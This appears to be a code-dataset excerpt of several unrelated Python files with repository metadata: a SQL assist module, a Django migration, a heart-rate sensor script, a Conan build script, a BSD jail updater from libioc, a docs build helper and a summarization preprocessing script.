if sample_data or description:
response['status'] = 0
response['headers'] = [col[0] for col in description] if description else []
response['full_headers'] = [{
'name': col[0],
'type': col[1],
'comment': ''
} for col in description]
response['rows'] = sample_data if sample_data else []
else:
response['message'] = _('Failed to get sample data.')
return response
@property
def cache_key(self):
return '%s-%s' % (self.interpreter['name'], self.user.username)
def _createAssist(self, db):
return Assist(db)
class Assist(object):
def __init__(self, db):
self.db = db
def get_databases(self):
dbs, description = query_and_fetch(self.db, 'SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA')
return [db[0] and db[0].strip() for db in dbs]
def get_tables(self, database, table_names=[]):
tables = self.get_tables_full(database, table_names)
return [table['name'] for table in tables]
def get_tables_full(self, database, table_names=[]):
tables, description = query_and_fetch(self.db, "SELECT TABLE_NAME, TABLE_COMMENT FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'" % database)
return [{"comment": table[1] and table[1].strip(), "type": "Table", "name": table[0] and table[0].strip()} for table in tables]
def get_columns(self, database, table):
columns = self.get_columns_full(database, table)
return [col['name'] for col in columns]
def get_columns_full(self, database, table):
columns, description = query_and_fetch(self.db, "SELECT COLUMN_NAME, DATA_TYPE, COLUMN_COMMENT FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='%s' AND TABLE_NAME='%s'" % (database, table))
return [{"comment": col[2] and col[2].strip(), "type": col[1], "name": col[0] and col[0].strip()} for col in columns]
def get_sample_data(self, database, table, column=None):
column = column or '*'
#data, description = query_and_fetch(self.db, 'SELECT %s FROM %s.%s limit 100' % (column, database, table))
#response['rows'] = data
#response['columns'] = []
return query_and_fetch(self.db, 'SELECT %s FROM %s.%s limit 100' % (column, database, table))
class FixedResultSet(object):
def __init__(self, data, metadata):
self.data = data
self.metadata = metadata
self.has_more = False
def cols(self):
return [str(col[0]) for col in self.metadata]
def rows(self):
return self.data if self.data is not None else []
class FixedResult(object):
def __init__(self, data, metadata):
self.data = data
self.metadata = metadata
def fetch(self, handle=None, start_over=None, rows=None):
return FixedResultSet(self.data, self.metadata)
| 34.066946 | 210 | 0.689388 |
7c250191bf3ac9bd184517465ed5ec381045a5cd | 1,264 | py | Python | erp/migrations/0035_auto_20200206_1109.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | 8 | 2020-07-23T08:17:28.000Z | 2022-03-09T22:31:36.000Z | erp/migrations/0035_auto_20200206_1109.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | 37 | 2020-07-01T08:47:33.000Z | 2022-02-03T19:50:58.000Z | erp/migrations/0035_auto_20200206_1109.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | 4 | 2021-04-08T10:57:18.000Z | 2022-01-31T13:16:31.000Z | # Generated by Django 3.0.3 on 2020-02-06 10:09
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('erp', '0034_accessibilite_entree_plain_pied'),
]
operations = [
migrations.AlterModelOptions(
name='activite',
options={'ordering': ('nom',), 'verbose_name': 'Activité', 'verbose_name_plural': 'Activités'},
),
migrations.AlterModelOptions(
name='equipementmalentendant',
options={'ordering': ('nom',), 'verbose_name': 'Équipement sourd/malentendant', 'verbose_name_plural': 'Équipements sourd/malentendant'},
),
migrations.AlterModelOptions(
name='label',
options={'ordering': ('nom',), 'verbose_name': "Label d'accessibilité", 'verbose_name_plural': "Labels d'accessibilité"},
),
migrations.AlterField(
model_name='erp',
name='activite',
field=models.ForeignKey(blank=True, help_text="Domaine d'activité de l'ERP. Attention, la recherche se fait sur les lettres accentuées", null=True, on_delete=django.db.models.deletion.SET_NULL, to='erp.Activite', verbose_name='Activité'),
),
]
| 39.5 | 250 | 0.641614 |
3da76bdaea90f8e15cd36e524ffe1eb91453bac7 | 969 | py | Python | main.py | Jeffrey-Gadenne/ENG103_GUI_IOT_DATABASE_HEART | f0b8f596fc42c5f08a0569d637ef6dfa33ea0355 | [
"MIT"
] | null | null | null | main.py | Jeffrey-Gadenne/ENG103_GUI_IOT_DATABASE_HEART | f0b8f596fc42c5f08a0569d637ef6dfa33ea0355 | [
"MIT"
] | null | null | null | main.py | Jeffrey-Gadenne/ENG103_GUI_IOT_DATABASE_HEART | f0b8f596fc42c5f08a0569d637ef6dfa33ea0355 | [
"MIT"
] | null | null | null | from heartrate_monitor import HeartRateMonitor
import time
import argparse
import Adafruit_DHT
import argparse
import sys
import tempread
sys.stdout = open ("heart.txt", "w")
dht_sensor = Adafruit_DHT.DHT11
pin = 5
humidity, temperature = Adafruit_DHT.read_retry(dht_sensor, pin)
parser = argparse.ArgumentParser(description="Read and print data from MAX30102")
parser.add_argument("-r", "--raw", action="store_true",
help="print raw data instead of calculation result")
parser.add_argument("-t", "--time", type=int, default=30,
help="duration in seconds to read from sensor, default 30")
args = parser.parse_args()
print('sensor starting...')
hrm = HeartRateMonitor(print_raw=args.raw, print_result=(not args.raw))
hrm.start_sensor()
try:
time.sleep(args.time)
except KeyboardInterrupt:
print('keyboard interrupt detected, exiting...')
hrm.stop_sensor()
print('sensor stoped!')
import gui
sys.stdout.close()
| 26.189189 | 81 | 0.728586 |
0e81231f074d3a9d0aae862d0496205cd19d5aaa | 1,122 | py | Python | build.py | gcuendet/conan-libjpeg-turbo | f974c40e839290d77318002f8be9cc164f6a33fb | [
"MIT"
] | null | null | null | build.py | gcuendet/conan-libjpeg-turbo | f974c40e839290d77318002f8be9cc164f6a33fb | [
"MIT"
] | null | null | null | build.py | gcuendet/conan-libjpeg-turbo | f974c40e839290d77318002f8be9cc164f6a33fb | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bincrafters import build_template_default
import platform
import copy
if __name__ == "__main__":
builder = build_template_default.get_builder()
items = []
for item in builder.items:
# skip mingw cross-builds
if not (platform.system() == "Windows" and item.settings["compiler"] == "gcc" and
item.settings["arch"] == "x86"):
new_build_requires = copy.copy(item.build_requires)
# add msys2 and mingw as a build requirement for mingw builds
if platform.system() == "Windows" and item.settings["compiler"] == "gcc":
new_build_requires["*"] = new_build_requires.get("*", []) + \
["mingw_installer/1.0@conan/stable",
"msys2_installer/latest@bincrafters/stable"]
items.append([item.settings, item.options, item.env_vars,
new_build_requires, item.reference])
else:
# or just add build
items.append(item)
builder.items = items
builder.run()
| 36.193548 | 89 | 0.582888 |
a3d7a64a8366fb641b44e64d89da8b8670e6be37 | 24,682 | py | Python | libioc/ResourceUpdater.py | himrock922/libioc | 83111de2320c96946234eec852c00de72482ea0f | [
"BSD-2-Clause"
] | null | null | null | libioc/ResourceUpdater.py | himrock922/libioc | 83111de2320c96946234eec852c00de72482ea0f | [
"BSD-2-Clause"
] | null | null | null | libioc/ResourceUpdater.py | himrock922/libioc | 83111de2320c96946234eec852c00de72482ea0f | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2017-2019, Stefan Grönke
# Copyright (c) 2014-2018, iocage
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted providing that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Updater for Releases and other LaunchableResources like Jails."""
import typing
import os
import os.path
import re
import shutil
import urllib
import urllib.error
import libioc.events
import libioc.errors
import libioc.Jail
# MyPy
import libzfs
class Updater:
"""Updater for Releases and other LaunchableResources like Jails."""
update_name: str
update_script_name: str
update_conf_name: str
_temporary_jail: 'libioc.Jail.JailGenerator'
def __init__(
self,
resource: 'libioc.LaunchableResource.LaunchableResource',
host: 'libioc.Host.HostGenerator'
) -> None:
self.resource = resource
self.host = host
@property
def logger(self) -> 'libioc.Logger.Logger':
"""Shortcut to the resources logger."""
return self.resource.logger
@property
def local_release_updates_dir(self) -> str:
"""Return the absolute path to updater directory (os-dependend)."""
return f"/var/db/{self.update_name}"
@property
def host_updates_dataset_name(self) -> str:
"""Return the name of the updates dataset."""
ReleaseGenerator = libioc.Release.ReleaseGenerator
if isinstance(self.resource, ReleaseGenerator):
release_dataset = self.resource.dataset
else:
release_dataset = self.resource.release.dataset
return f"{release_dataset.name}/updates"
@property
def host_updates_dataset(self) -> libzfs.ZFSDataset:
"""Return the updates dataset."""
dataset_name = self.host_updates_dataset_name
zfs = self.resource.zfs
_dataset = zfs.get_or_create_dataset(dataset_name)
dataset = _dataset # type: libzfs.ZFSDataset
return dataset
@property
def host_updates_dir(self) -> str:
"""Return the mountpoint of the updates dataset."""
return str(self.host_updates_dataset.mountpoint)
@property
def local_temp_dir(self) -> str:
"""Return the update temp directory relative to the jail root."""
return f"{self.local_release_updates_dir}/temp"
@property
def release(self) -> 'libioc.Release.ReleaseGenerator':
"""Return the associated release."""
if isinstance(self.resource, libioc.Release.ReleaseGenerator):
return self.resource
return self.resource.release
def _wrap_command(self, command: str, kind: str) -> str:
return command
@property
def patch_version(self) -> int:
"""
Return the latest known patch version.
When no patch version is known the release was not updated yet.
"""
return 0
@property
def temporary_jail(self) -> 'libioc.Jail.JailGenerator':
"""Temporary jail instance that will be created to run the update."""
if hasattr(self, "_temporary_jail") is False:
temporary_name = self.resource.name.replace(".", "-") + "_u"
temporary_jail = libioc.Jail.JailGenerator(
{
"name": temporary_name,
"basejail": False,
"allow_mount_nullfs": "1",
"release": self.release.name,
"exec_start": None,
"securelevel": "0",
"allow_chflags": True,
"vnet": False,
"ip4_addr": None,
"ip6_addr": None,
"defaultrouter": None,
"mount_devfs": True,
"mount_fdescfs": False
},
new=True,
logger=self.resource.logger,
zfs=self.resource.zfs,
host=self.resource.host,
dataset=self.resource.dataset
)
temporary_jail.config.file = "config_update.json"
temporary_jail.config.ignore_source_config = True
root_path = temporary_jail.root_path
destination_dir = f"{root_path}{self.local_release_updates_dir}"
temporary_jail.fstab.file = "fstab_update"
temporary_jail.fstab.new_line(
source=self.host_updates_dir,
destination=destination_dir,
options="rw"
)
if os.path.isdir(destination_dir) is False:
os.makedirs(destination_dir, 0o755)
temporary_jail.fstab.save()
self._temporary_jail = temporary_jail
return self._temporary_jail
@property
def _fetch_command(self) -> typing.List[str]:
raise NotImplementedError("To be implemented by inheriting classes")
@property
def _update_command(self) -> typing.List[str]:
raise NotImplementedError("To be implemented by inheriting classes")
def _get_release_trunk_file_url(
self,
release: 'libioc.Release.ReleaseGenerator',
filename: str
) -> str:
raise NotImplementedError("To be implemented by inheriting classes")
def _create_updates_dir(self) -> None:
self._create_dir(self.host_updates_dir)
def _create_download_dir(self) -> None:
self._create_dir(f"{self.host_updates_dir}/temp")
def _create_jail_update_dir(self) -> None:
root_path = self.release.root_path
jail_update_dir = f"{root_path}{self.local_release_updates_dir}"
self._clean_create_dir(jail_update_dir)
shutil.chown(jail_update_dir, "root", "wheel")
os.chmod(jail_update_dir, 0o755) # nosec: accessible directory
def _create_dir(self, directory: str) -> None:
if os.path.isdir(directory):
return
os.makedirs(directory)
def _clean_create_dir(self, directory: str) -> None:
if os.path.ismount(directory) is True:
libioc.helpers.umount(directory, force=True, logger=self.logger)
if os.path.isdir(directory) is True:
self.logger.verbose(f"Deleting existing directory {directory}")
shutil.rmtree(directory)
self._create_dir(directory)
@property
def local_release_updater_config(self) -> str:
"""Return the local path to the release updater config."""
return f"{self.local_release_updates_dir}/{self.update_conf_name}"
def _download_updater_asset(
self,
local: str,
remote: str,
mode: int
) -> None:
url = self._get_release_trunk_file_url(
release=self.release,
filename=remote
)
if os.path.isfile(local):
os.remove(local)
_request = urllib.request # type: ignore
try:
self.logger.verbose(f"Downloading update assets from {url}")
_request.urlretrieve(url, local) # nosec: url validated
except urllib.error.HTTPError as http_error:
raise libioc.errors.DownloadFailed(
url="EOL Warnings",
code=http_error.code,
logger=self.logger
)
os.chmod(local, mode)
self.logger.debug(
f"Update-asset {remote} for release '{self.release.name}'"
f" saved to {local}"
)
def _modify_updater_config(self, path: str) -> None:
pass
def _pull_updater(self) -> None:
self._create_updates_dir()
self._download_updater_asset(
mode=0o744,
remote=f"usr.sbin/{self.update_name}/{self.update_script_name}",
local=f"{self.host_updates_dir}/{self.update_script_name}"
)
if self.release.version_number >= 12:
conf_path = f"usr.sbin/{self.update_name}/{self.update_conf_name}"
else:
conf_path = f"etc/{self.update_conf_name}"
self._download_updater_asset(
mode=0o644,
remote=conf_path,
local=f"{self.host_updates_dir}/{self.update_conf_name}"
)
self._modify_updater_config(
path=f"{self.host_updates_dir}/{self.update_conf_name}"
)
def fetch(
self,
event_scope: typing.Optional['libioc.events.Scope']=None
) -> typing.Generator['libioc.events.IocEvent', None, None]:
"""Fetch the update of a release."""
ReleaseGenerator = libioc.Release.ReleaseGenerator
if isinstance(self.resource, ReleaseGenerator) is False:
raise libioc.errors.NonReleaseUpdateFetch(
resource=self.resource,
logger=self.logger
)
self.resource._require_release_supported()
events = libioc.events
releaseUpdatePullEvent = events.ReleaseUpdatePull(
self.release,
scope=event_scope
)
releaseUpdateDownloadEvent = events.ReleaseUpdateDownload(
self.release,
scope=releaseUpdatePullEvent.scope
)
yield releaseUpdatePullEvent.begin()
try:
self._pull_updater()
# Additional pre-fetch check on HardenedBSD
if self.host.distribution.name == "HardenedBSD":
_version_snapshot_name = (
f"{self.release.root_dataset.name}"
f"@p{self.patch_version}"
)
try:
self.resource.zfs.get_snapshot(_version_snapshot_name)
yield releaseUpdatePullEvent.skip()
except libzfs.ZFSException:
yield releaseUpdatePullEvent.end()
else:
yield releaseUpdatePullEvent.end()
except Exception as e:
yield releaseUpdatePullEvent.fail(e)
raise
yield releaseUpdateDownloadEvent.begin()
if releaseUpdatePullEvent.skipped is True:
yield releaseUpdateDownloadEvent.skip()
return
self.logger.verbose(
f"Fetching updates for release '{self.release.name}'"
)
self._pre_fetch()
try:
env = dict()
env_clone_keys = ["http_proxy"]
for key in os.environ:
if key.lower() in env_clone_keys:
env[key.lower()] = os.environ[key]
self._create_download_dir()
libioc.helpers.exec(
self._wrap_command(" ".join(self._fetch_command), "fetch"),
shell=True, # nosec: B604
logger=self.logger,
env=env
)
except Exception as e:
yield releaseUpdateDownloadEvent.fail(e)
raise
finally:
self._post_fetch()
yield releaseUpdateDownloadEvent.end()
def _snapshot_release_after_update(self) -> None:
self.release.snapshot(f"p{self.patch_version}")
def apply(
self,
event_scope: typing.Optional['libioc.events.Scope']=None
) -> typing.Generator[typing.Union[
'libioc.events.IocEvent',
bool
], None, None]:
"""Apply the fetched updates to the associated release or jail."""
updates_dataset = self.host_updates_dataset
snapshot_name = libioc.ZFS.append_snapshot_datetime(
f"{updates_dataset.name}@pre-update"
)
runResourceUpdateEvent = libioc.events.RunResourceUpdate(
self.resource,
scope=event_scope
)
_scope = runResourceUpdateEvent.scope
yield runResourceUpdateEvent.begin()
# create snapshot before the changes
updates_dataset.snapshot(name=snapshot_name, recursive=True)
def _rollback_updates_snapshot() -> None:
self.logger.spam(f"Rolling back to snapshot {snapshot_name}")
snapshot = self.resource.zfs.get_snapshot(snapshot_name)
snapshot.rollback(force=True)
snapshot.delete()
runResourceUpdateEvent.add_rollback_step(_rollback_updates_snapshot)
jail = self.temporary_jail
changed: bool = False
try:
for event in self._update_jail(jail, event_scope=_scope):
if isinstance(event, libioc.events.IocEvent):
yield event
else:
changed = (event is True)
except Exception as e:
yield runResourceUpdateEvent.fail(e)
raise
# restore any changes to the update dataset
_rollback_updates_snapshot()
if isinstance(self.resource, libioc.Release.ReleaseGenerator):
self._snapshot_release_after_update()
yield runResourceUpdateEvent.end()
yield changed
def _update_jail(
self,
jail: 'libioc.Jail.JailGenerator',
event_scope: typing.Optional['libioc.events.Scope']
) -> typing.Generator[typing.Union[
'libioc.events.IocEvent',
bool
], None, None]:
events = libioc.events
executeResourceUpdateEvent = events.ExecuteResourceUpdate(
self.resource,
scope=event_scope
)
_scope = executeResourceUpdateEvent.scope
yield executeResourceUpdateEvent.begin()
skipped = False
self._pre_update()
try:
self._create_jail_update_dir()
for event in libioc.Jail.JailGenerator.fork_exec(
jail,
self._wrap_command(" ".join(self._update_command), "update"),
passthru=False,
start_dependant_jails=False,
event_scope=_scope
):
if isinstance(event, libioc.events.JailCommand) is True:
if (event.done is True) and (event.error is None):
_skipped_text = "No updates are available to install."
skipped = (_skipped_text in event.stdout) is True
yield event
self.logger.debug(
f"Update of resource '{self.resource.name}' finished"
)
except Exception as e:
err = libioc.errors.UpdateFailure(
name=self.release.name,
reason=(
f"{self.update_name} failed"
),
logger=self.logger
)
yield executeResourceUpdateEvent.fail(err)
raise e
finally:
if jail.running:
self.logger.debug(
"The update jail is still running. "
"Force-stopping it now."
)
yield from libioc.Jail.JailGenerator.stop(
jail,
force=True,
event_scope=executeResourceUpdateEvent.scope
)
self._post_update()
if skipped is True:
yield executeResourceUpdateEvent.skip("already up to date")
else:
yield executeResourceUpdateEvent.end()
self.logger.verbose(f"Resource '{self.resource.name}' updated")
yield True # ToDo: yield False if nothing was updated
def _pre_fetch(self) -> None:
"""Execute before executing the fetch command."""
pass
def _post_fetch(self) -> None:
"""Execute after executing the fetch command."""
pass
def _pre_update(self) -> None:
"""Execute before executing the update command."""
pass
def _post_update(self) -> None:
"""Execute after executing the update command."""
pass
class HardenedBSD(Updater):
"""Updater for HardenedBSD."""
update_name: str = "hbsd-update"
update_script_name: str = "hbsd-update"
update_conf_name: str = "hbsd-update.conf"
@property
def _update_command(self) -> typing.List[str]:
return [
f"{self.local_release_updates_dir}/{self.update_script_name}",
"-c",
f"{self.local_release_updates_dir}/{self.update_conf_name}",
"-i", # ignore version check (offline)
"-v", str(self.patch_version), "-U", # skip version check
"-n", # no kernel
"-V",
"-D", # no download,
"-T",
"-t",
self.local_temp_dir
]
@property
def _fetch_command(self) -> typing.List[str]:
return [
f"{self.host_updates_dir}/{self.update_script_name}",
"-k",
self.release.name,
"-f", # fetch only
"-c",
f"{self.host_updates_dir}/{self.update_conf_name}",
"-V",
"-T",
"-t",
f"{self.host_updates_dir}/temp",
"-r"
f"{self.resource.root_path}"
]
def _get_release_trunk_file_url(
self,
release: 'libioc.Release.ReleaseGenerator',
filename: str
) -> str:
return "/".join([
"https://raw.githubusercontent.com/HardenedBSD/hardenedBSD",
release.hbds_release_branch,
filename
])
@property
def release_branch_name(self) -> str:
"""Return the branch name of the HBSD release."""
return f"hardened/{self.host.release_version.lower()}/master"
def _pull_updater(self) -> None:
super()._pull_updater()
update_info_url = "/".join([
"https://updates.hardenedbsd.org/pub/HardenedBSD/updates/",
self.release_branch_name,
self.host.processor,
"update-latest.txt"
])
local_path = f"{self.host_updates_dir}/update-latest.txt"
_request = urllib.request # type: ignore
_request.urlretrieve( # nosec: official HardenedBSD URL
update_info_url,
local_path
)
os.chmod(local_path, 0o744)
@property
def patch_version(self) -> int:
"""
Return the latest known patch version.
On HardenedBSD this version is published among the updated downloaded
by hbsd-update. Right before fetching an updater this file is
downloaded, so that the revision mentioned can be used for snapshot
creation.
"""
local_path = f"{self.host_updates_dir}/update-latest.txt"
if os.path.isfile(local_path):
with open(local_path, "r", encoding="utf-8") as f:
return int(f.read().split("|")[1].split("-")[1][1:])
else:
return 0
class FreeBSD(Updater):
"""Updater for FreeBSD."""
update_name: str = "freebsd-update"
update_script_name: str = "freebsd-update.sh"
update_conf_name: str = "freebsd-update.conf"
def _get_release_trunk_file_url(
self,
release: 'libioc.Release.ReleaseGenerator',
filename: str
) -> str:
if release.name == "11.0-RELEASE":
release_name = "11.0.1"
else:
fragments = release.name.split("-", maxsplit=1)
release_name = f"{fragments[0]}.0"
base_url = "https://svn.freebsd.org/base/release"
return f"{base_url}/{release_name}/{filename}"
@property
def _base_release_symlink_location(self) -> str:
"""Return the virtual path of a symlink to the release p0 snapshot."""
return f"/tmp/ioc-release-{self.release.full_name}-p0" # nosec: B108
@property
def _update_command(self) -> typing.List[str]:
return [
f"{self.local_release_updates_dir}/{self.update_script_name}",
"--not-running-from-cron",
"-d",
self.local_temp_dir,
"-b",
f"{self._base_release_symlink_location}/",
"--currently-running",
self.release.name,
"-r",
self.release.name,
"-f",
f"{self.local_release_updates_dir}/{self.update_conf_name}",
"install"
]
@property
def _fetch_command(self) -> typing.List[str]:
return [
f"{self.host_updates_dir}/{self.update_script_name}",
"-d",
f"{self.host_updates_dir}/temp",
"--currently-running",
self.release.name,
"-b",
f"{self._base_release_symlink_location}/",
"-f",
f"{self.host_updates_dir}/{self.update_conf_name}",
"--not-running-from-cron",
"fetch"
]
def _modify_updater_config(self, path: str) -> None:
with open(path, "r+", encoding="utf-8") as f:
content = f.read()
content = re.sub(
r"^Components .+$",
"Components world",
content,
flags=re.MULTILINE
)
f.seek(0)
f.write(content)
f.truncate()
def _wrap_command(self, command: str, kind: str) -> str:
if kind == "update":
tolerated_error_message = (
"echo $OUTPUT"
" | grep -c 'No updates are available to install.'"
" >> /dev/null || exit $RC"
)
elif kind == "fetch":
tolerated_error_message = (
"echo $OUTPUT"
" | grep -c 'HAS PASSED ITS END-OF-LIFE DATE.'"
" >> /dev/null || exit $RC"
)
else:
raise ValueError
_command = "\n".join([
"set +e",
f"OUTPUT=\"$({command})\"",
"RC=$?",
"echo $OUTPUT",
"if [ $RC -gt 0 ]; then",
tolerated_error_message,
"fi"
])
return _command
@property
def patch_version(self) -> int:
"""
Return the latest known patch version.
This version is parsed from FreeBSDs /bin/freebsd-version file.
"""
return int(libioc.helpers.get_os_version(
f"{self.resource.root_path}/bin/freebsd-version"
)["patch"])
def _pre_fetch(self) -> None:
"""Execute before executing the fetch command."""
symlink_src = self.release.root_path
if "p0" in [x.snapshot_name for x in self.release.version_snapshots]:
# use p0 snapshot if available
symlink_src += "/.zfs/snapshot/p0"
os.symlink(symlink_src, self._base_release_symlink_location)
def _post_fetch(self) -> None:
"""Execute after executing the fetch command."""
os.unlink(self._base_release_symlink_location)
def _pre_update(self) -> None:
"""Execute before executing the update command."""
lnk = f"{self.resource.root_path}{self._base_release_symlink_location}"
self.resource.require_relative_path(f"{lnk}/..")
if os.path.islink(lnk) is True:
os.unlink(lnk)
os.symlink("/", lnk)
def _post_update(self) -> None:
"""Execute after executing the update command."""
lnk = f"{self.resource.root_path}{self._base_release_symlink_location}"
self.resource.require_relative_path(f"{lnk}/..")
os.unlink(lnk)
def get_launchable_update_resource( # noqa: T484
host: 'libioc.Host.HostGenerator',
resource: 'libioc.Resource.Resource'
) -> Updater:
"""Return an updater instance for the host distribution."""
_class: typing.Type[Updater]
if host.distribution.name == "HardenedBSD":
_class = HardenedBSD
else:
_class = FreeBSD
return _class(
host=host,
resource=resource
)
| 33.672578 | 79 | 0.589296 |
ba144dec17ab0cdf34bb256b4bb1cb541c69fb52 | 403 | py | Python | docs/setup.py | sandialabs/slycat | efbb91ce4ea4da08b58399eb820f6d6987408e44 | [
"BSD-3-Clause"
] | 66 | 2015-01-06T20:53:50.000Z | 2022-03-30T17:25:04.000Z | docs/setup.py | agentdavidjoseph/slycat | 690e1cb07a6fa990d7206265e18edb22ae3f62e7 | [
"BSD-3-Clause"
] | 782 | 2015-01-05T15:42:30.000Z | 2022-03-11T03:27:52.000Z | docs/setup.py | agentdavidjoseph/slycat | 690e1cb07a6fa990d7206265e18edb22ae3f62e7 | [
"BSD-3-Clause"
] | 23 | 2015-04-29T08:16:27.000Z | 2022-01-05T23:21:54.000Z | import os
import shutil
import subprocess
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
docs_dir = os.path.join(root_dir, "docs/source")
build_dir = os.path.join(docs_dir, "_build")
# Always build the documentation from scratch.
if os.path.exists(build_dir):
shutil.rmtree(build_dir)
# Generate the HTML documentation.
subprocess.check_call(["make", "html"], cwd=docs_dir)
| 26.866667 | 70 | 0.766749 |
a84821915a4da4419a2d501532e00e6811cbacb4 | 12,043 | py | Python | summarize/nnsum/summarization-datasets/preprocess_cnn_dailymail.py | AIPHES/live-blog-summarization | a5f899ea07a098e1e0b3ab92cd3d430776e6412a | [
"Apache-2.0"
] | 2 | 2019-01-17T17:43:09.000Z | 2019-01-17T17:50:38.000Z | summarize/nnsum/summarization-datasets/preprocess_cnn_dailymail.py | AIPHES/live-blog-summarization | a5f899ea07a098e1e0b3ab92cd3d430776e6412a | [
"Apache-2.0"
] | null | null | null | summarize/nnsum/summarization-datasets/preprocess_cnn_dailymail.py | AIPHES/live-blog-summarization | a5f899ea07a098e1e0b3ab92cd3d430776e6412a | [
"Apache-2.0"
] | 1 | 2021-09-19T08:29:08.000Z | 2021-09-19T08:29:08.000Z | import rouge_papier
import requests
import argparse
import pathlib
import os
import shutil
import zipfile
import tempfile
import spacy
from spacy.tokens import Doc
import hashlib
import ujson as json
import re
from multiprocessing import Pool, cpu_count
# Modified Abigail See's preprocessing code.
class WhitespaceTokenizer(object):
def __init__(self, vocab):
self.vocab = vocab
def __call__(self, text):
words = text.split(' ')
# All tokens 'own' a subsequent space character in this tokenizer
spaces = [True] * len(words)
return Doc(self.vocab, words=words, spaces=spaces)
NUM_EXPECTED_CNN_STORIES = 92579
NUM_EXPECTED_DM_STORIES = 219506
dm_single_close_quote = u'\u2019' # unicode
dm_double_close_quote = u'\u201d'
END_TOKENS = ['.', '!', '?', '...', "'", "`", '"', dm_single_close_quote, dm_double_close_quote, ")"]
def hashhex(s):
"""Returns a heximal formated SHA1 hash of the input string."""
h = hashlib.sha1()
h.update(s)
return h.hexdigest()
def get_url_hashes(url_list):
return [hashhex(url.encode("utf8")) for url in url_list]
REMAP = {"-LRB-": "(", "-RRB-": ")", "-LCB-": "{", "-RCB-": "}",
"-LSB-": "[", "-RSB-": "]", "``": '"', "''": '"'}
def fix_summary(lines):
text = "\n".join(lines)
return re.sub(
r"-LRB-|-RRB-|-LCB-|-RCB-|-LSB-|-RSB-|``|''",
lambda m: REMAP.get(m.group()), text)
def fix_article(lines, nlp):
inputs = []
for line in lines:
line = re.sub(
r"-LRB-|-RRB-|-LCB-|-RCB-|-LSB-|-RSB-|``|''",
lambda m: REMAP.get(m.group()), line)
doc = nlp(line)
for sent in doc.sents:
text = sent.text.strip()
tokens = [w.text.strip().lower() for w in sent]
tc = len([w for w in tokens if len(w) > 0])
if tc == 0:
continue
pos = [w.pos_ for w in sent]
ne = [w.ent_type_ for w in sent]
word_count = len(tokens)
inputs.append({
"text": text,
"tokens": tokens,
"pos": pos,
"ne": ne,
"word_count": word_count})
for i, input in enumerate(inputs, 1):
input["sentence_id"] = i
return inputs
def read_text_file(text_file):
lines = []
with open(text_file, "r") as f:
for line in f:
lines.append(line.strip())
return lines
def check_num_stories(stories_dir, num_expected):
num_stories = len(os.listdir(stories_dir))
if num_stories != num_expected:
raise Exception(
("stories directory {} contains {} "
"files but should contain {}").format(
stories_dir, num_stories, num_expected))
def download_file_from_google_drive(id, expected_size, destination):
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
size = 0
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
size += len(chunk)
print(
"[{:10d} of {:10d}]".format(size, expected_size),
end="\r" if size < expected_size else "\n",
flush=True)
if size != expected_size:
raise Exception(
"Download failed! "
"Actual file size differs from expected file size!")
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params = { 'id' : id }, stream = True)
token = get_confirm_token(response)
if token:
params = { 'id' : id, 'confirm' : token }
response = session.get(URL, params = params, stream = True)
save_response_content(response, destination)
def unzip_file(path, dest):
try:
zip_file = zipfile.ZipFile(path)
zip_file.extractall(dest)
finally:
zip_file.close()
def download_urls(dest_dir):
def save_url(response, dest):
CHUNK_SIZE = 32768
with open(dest, "wb") as fp:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk:
fp.write(chunk)
root_url = "https://github.com/abisee/cnn-dailymail/raw/master/url_lists/"
train_url = root_url + "all_train.txt"
val_url = root_url + "all_val.txt"
test_url = root_url + "all_test.txt"
train_url_path = os.path.join(dest_dir, "all_train.txt")
val_url_path = os.path.join(dest_dir, "all_val.txt")
test_url_path = os.path.join(dest_dir, "all_test.txt")
session = requests.Session()
save_url(session.get(train_url, stream=True), train_url_path)
save_url(session.get(val_url, stream=True), val_url_path)
save_url(session.get(test_url, stream=True), test_url_path)
return train_url_path, val_url_path, test_url_path
def get_art_abs(story_file):
lines = read_text_file(story_file)
# Put periods on the ends of lines that are missing them (this is a problem in the dataset because many image captions don't end in periods; consequently they end up in the body of the article as run-on sentences)
lines = [fix_missing_period(line) for line in lines]
# Separate out article and abstract sentences
article_lines = []
highlights = []
